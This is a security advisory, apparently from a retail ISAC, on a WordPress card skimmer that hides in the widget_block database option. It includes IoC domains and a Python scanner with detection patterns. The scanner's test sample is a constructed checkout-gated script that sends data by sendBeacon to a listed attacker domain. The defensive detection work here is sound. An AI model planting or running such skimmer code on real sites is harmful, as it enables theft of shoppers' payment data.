Executive Summary
A sophisticated credit card skimmer malware has been discovered targeting WordPress websites, stealthily injecting malicious JavaScript into the site’s database to steal sensitive payment information. This skimmer, designated malware.magento_shoplift.273 by Sucuri, specifically activates on checkout pages, either by hijacking legitimate payment fields or injecting fake credit card forms. The stolen data, including credit card numbers and billing information, is obfuscated using Base64 encoding and AES-CBC encryption before being sent to attacker-controlled domains. Because it is concealed in the WordPress database rather than in the usual file locations, it evades detection by common security tools.
Community Impact
Retail and hospitality sector organizations, which depend heavily on e-commerce platforms for transactions, are particularly vulnerable to sophisticated, difficult-to-detect credit card skimmers. A successful attack could lead to widespread theft of customer payment data, resulting in fraudulent transactions and potential regulatory fines for data breaches. RH-ISAC Core Members are encouraged to review this report and the report linked above, and to ingest the Indicators of Compromise included below.
Technical Analysis
This credit card skimmer malware infiltrates WordPress websites by injecting obfuscated JavaScript into the wp_options database table, specifically targeting the widget_block entry. By embedding itself in the database rather than theme files or plugins, the malware evades traditional file-based malware scans. The malicious script only activates on checkout pages by checking if the URL contains “checkout,” ensuring it captures sensitive payment information without raising suspicion.
The malware dynamically creates a fake payment form that mimics legitimate processors like Stripe or hijacks existing form fields, allowing it to capture credit card numbers, CVV codes, expiration dates, and billing addresses in real-time. To avoid detection during data transmission, the malware obfuscates stolen data using Base64 encoding and AES-CBC encryption. It then silently exfiltrates this data to attacker-controlled domains (e.g., valhafather[.]xyz and fqbe23[.]xyz) using the navigator.sendBeacon function, which transmits data without disrupting user activity.
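Because the injection lives in the wp_options table rather than on disk, a file scanner will not see it; the check has to be run against the option value itself (for example the result of `SELECT option_value FROM wp_options WHERE option_name = 'widget_block';`). The following Python script is an added example written for this advisory, not code from Sucuri or from WordPress. It scans a widget_block value for the behaviours described above (an inline script, a URL check for "checkout", a navigator.sendBeacon call, Base64 helpers, AES/CBC references) and for the two domains listed in the IoC section, and it also keeps a SHA-256 baseline of the option so that a later change can be flagged the way file integrity monitoring flags a changed file. The serialization helper and the two sample widget values are constructed for the example; the suspicious sample only carries the indicator strings and does not capture anything.

```python
"""Scan a WordPress widget_block option value for database-resident skimmer
indicators and keep an integrity baseline of the option. Added example for
this advisory; the samples below are constructed, not taken from a real site."""
import hashlib
import re

# Domains from the advisory's IoC list, written in their normal form so they
# match what an injected script would actually reference.
IOC_DOMAINS = {"valhafather.xyz", "fqbe23.xyz"}

# One pattern per behaviour described in the technical analysis.
INDICATORS = {
    "inline_script": re.compile(r"<script\b", re.I),
    # URL/location check followed closely by the word "checkout"
    "checkout_gate": re.compile(r"(?:location|href|url)[^;]{0,60}checkout", re.I),
    "send_beacon": re.compile(r"navigator\s*\.\s*sendBeacon", re.I),
    "base64_helper": re.compile(r"\b(?:atob|btoa)\s*\("),
    "aes_cbc": re.compile(r"AES|CBC|CryptoJS", re.I),
    "base64_blob": re.compile(r"[A-Za-z0-9+/]{60,}={0,2}"),
}

DOMAIN_RE = re.compile(r"https?://([A-Za-z0-9.\[\]-]+)", re.I)


def extract_domains(text):
    """Return lowercase hostnames referenced by URLs in text, un-defanging '[.]'."""
    return {m.replace("[.]", ".").lower() for m in DOMAIN_RE.findall(text)}


def scan_widget_block(option_value):
    """Return the indicators hit, any known-bad domains, and an overall verdict."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(option_value)]
    ioc_hits = sorted(extract_domains(option_value) & IOC_DOMAINS)
    # A legitimate HTML widget may contain a script on its own, so require
    # the script plus at least two skimmer behaviours, or a known domain.
    behaviours = set(hits) - {"inline_script"}
    suspicious = bool(ioc_hits) or ("inline_script" in hits and len(behaviours) >= 2)
    return {"indicators": hits, "ioc_domains": ioc_hits, "suspicious": suspicious}


def option_digest(option_value):
    """SHA-256 of the raw option value, stored as the integrity baseline."""
    return hashlib.sha256(option_value.encode("utf-8")).hexdigest()


def changed_since_baseline(option_value, baseline_digest):
    """True when the stored option no longer matches the recorded baseline."""
    return option_digest(option_value) != baseline_digest


def serialize_widget_block(html):
    """Build a widget_block value in the PHP-serialized layout WordPress uses
    for one block widget (s:<byte length>:"..."). Constructed for this example."""
    body = f"<!-- wp:html -->{html}<!-- /wp:html -->"
    inner = f'a:1:{{s:7:"content";s:{len(body.encode("utf-8"))}:"{body}";}}'
    return f'a:2:{{i:2;{inner}s:12:"_multiwidget";i:1;}}'


# Constructed samples: a harmless store notice, and a widget carrying the
# indicator strings described in the advisory (placeholder payload only).
BENIGN = serialize_widget_block("<p>Free shipping on orders over $50.</p>")
SUSPICIOUS = serialize_widget_block(
    '<script>if(location.href.indexOf("checkout")>-1){'
    'navigator.sendBeacon("https://valhafather.xyz/",btoa("constructed placeholder"))}'
    "</script>"
)

if __name__ == "__main__":
    baseline = option_digest(BENIGN)  # taken when the site was known clean
    for label, value in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        result = scan_widget_block(value)
        print(label, result, "changed:", changed_since_baseline(value, baseline))
```

Run it against the live option value on a schedule alongside file integrity monitoring; a verdict of suspicious, or a digest change that no administrator made, is the trigger to pull the widget content for review. The domain match is exact, so extend IOC_DOMAINS as new indicators are published.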
Mitigations
Sucuri has provided the following mitigation strategies, reproduced here for RH-ISAC Core Member awareness:
- Regular Updates: Outdated software is a primary target for attackers who exploit vulnerabilities in old plugins and themes. Avoid this by consistently updating your site and applying the latest security patches. Alternatively, deploy a Web Application Firewall (WAF) for virtual patching.
- Admin Account Management: Weak admin passwords are a gateway for attackers. Utilize two-factor authentication and regularly review all admin accounts to ensure their validity. Update passwords frequently, making sure to use strong, unique passwords to bolster security.
- File Integrity Monitoring: Implement file integrity monitoring to detect any unauthorized changes to your website files. This serves as an early warning system for rapid response to potential threats.
- Web Application Firewall: A website firewall can effectively block malicious traffic and prevent hacking attempts from reaching your server.
Indicators of Compromise
Below is a small collection of malicious domains that have been flagged as potential indicators of compromise (IOCs) in relation to malware.magento_shoplift.273, provided by Sucuri:
- valhafather[.]xyz
- fqbe23[.]xyz